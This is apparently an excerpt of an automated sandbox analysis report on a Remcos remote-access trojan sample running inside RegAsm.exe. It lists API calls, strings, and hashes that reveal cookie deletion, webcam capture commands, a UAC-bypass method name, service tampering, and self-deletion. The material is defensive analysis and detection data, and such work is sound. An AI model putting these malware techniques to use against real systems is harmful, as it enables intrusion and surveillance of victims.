                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                  • __fassign.LIBCMT ref: 0044B479
                                  • __fassign.LIBCMT ref: 0044B494
                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                  • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                  • String ID:
                                  • API String ID: 1324828854-0
                                  • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                  • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                  • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                  • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID: D[E$D[E
                                  • API String ID: 269201875-3695742444
                                  • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                  • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                  • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                  • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                    • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumInfoOpenQuerysend
                                  • String ID: xUG$NG$NG$TG
                                  • API String ID: 3114080316-2811732169
                                  • Opcode ID: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                  • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                  • Opcode Fuzzy Hash: fc7062b0e2d73897183f332ff677a088385e4ff99dcd0168fd06527908a237fe
                                  • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                  APIs
                                    • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                    • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                    • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                    • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • _wcslen.LIBCMT ref: 0041B763
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                  • API String ID: 37874593-122982132
                                  • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                  • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                  • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
                                  • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                  APIs
                                    • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                    • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                    • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 1133728706-4073444585
                                  • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                  • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                  • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
                                  • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                  • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                  • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                  • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                  • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                  • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                  • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreatePointerWrite
                                  • String ID: hpF
                                  • API String ID: 1852769593-151379673
                                  • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                  • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                  • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                  • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                  APIs
                                    • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                  • _free.LIBCMT ref: 00450F48
                                    • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                  • _free.LIBCMT ref: 00450F53
                                  • _free.LIBCMT ref: 00450F5E
                                  • _free.LIBCMT ref: 00450FB2
                                  • _free.LIBCMT ref: 00450FBD
                                  • _free.LIBCMT ref: 00450FC8
                                  • _free.LIBCMT ref: 00450FD3
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                  • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                  • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                  • int.LIBCPMT ref: 00411183
                                    • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                    • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                  • std::_Facet_Register.LIBCPMT ref: 004111C3
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                  • String ID: (mG
                                  • API String ID: 2536120697-4059303827
                                  • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                  • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                  • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                  • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                  • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                  • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                  • Opcode Fuzzy Hash: fe039640f614891bfb869f3d54459c43faa771a51d809113de29b3036e5dc2e7
                                  • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004075D0
                                    • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                    • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                  • CoUninitialize.OLE32 ref: 00407629
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitializeObjectUninitialize_wcslen
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                  • API String ID: 3851391207-1839356972
                                  • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                  • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                  • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                  • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                  • GetLastError.KERNEL32 ref: 0040BAE7
                                  Strings
                                  • UserProfile, xrefs: 0040BAAD
                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                  • [Chrome Cookies not found], xrefs: 0040BB01
                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                  • API String ID: 2018770650-304995407
                                  • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                  • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                  • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
                                  • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                  APIs
                                  • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                  • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Console$AllocOutputShowWindow
                                  • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                  • API String ID: 2425139147-2278869229
                                  • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                  • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                  • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                  • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                  APIs
                                  • __allrem.LIBCMT ref: 0043AC69
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                  • __allrem.LIBCMT ref: 0043AC9C
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                  • __allrem.LIBCMT ref: 0043ACD1
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 1992179935-0
                                  • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                  • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                  • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                  • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                  APIs
                                  • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prologSleep
                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                  • API String ID: 3469354165-3054508432
                                  • Opcode ID: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                  • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                  • Opcode Fuzzy Hash: 675044920d57351bd4be636fd76d132256166d9fc3ead1ba86e83f4fd14bb599
                                  • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                  APIs
                                    • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                  • GetNativeSystemInfo.KERNEL32(?,0040D2A2,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411DC9
                                    • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E10
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E17
                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F2A
                                    • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37,?,?,?,?,?), ref: 004120E7
                                    • Part of subcall function 00412077: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 004120EE
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                  • String ID:
                                  • API String ID: 3950776272-0
                                  • Opcode ID: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                  • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                  • Opcode Fuzzy Hash: 03879881e365d714915aafd98c27fc7559b9a312a1bd96baf04abeae924ccd8f
                                  • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __cftoe
                                  • String ID:
                                  • API String ID: 4189289331-0
                                  • Opcode ID: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                  • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                  • Opcode Fuzzy Hash: f6186a22dc1495ee10cb0196102dbbca6683bf9def1bac59c87bc21f53538327
                                  • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                  • String ID:
                                  • API String ID: 493672254-0
                                  • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                  • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                  • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                  • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                  APIs
                                  • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • _free.LIBCMT ref: 0044824C
                                  • _free.LIBCMT ref: 00448274
                                  • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                  • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • _abort.LIBCMT ref: 00448293
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                  • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                  • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                                  • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                  • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                  • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                                  • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ControlManager
                                  • String ID:
                                  • API String ID: 221034970-0
                                  • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                  • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                  • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                                  • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
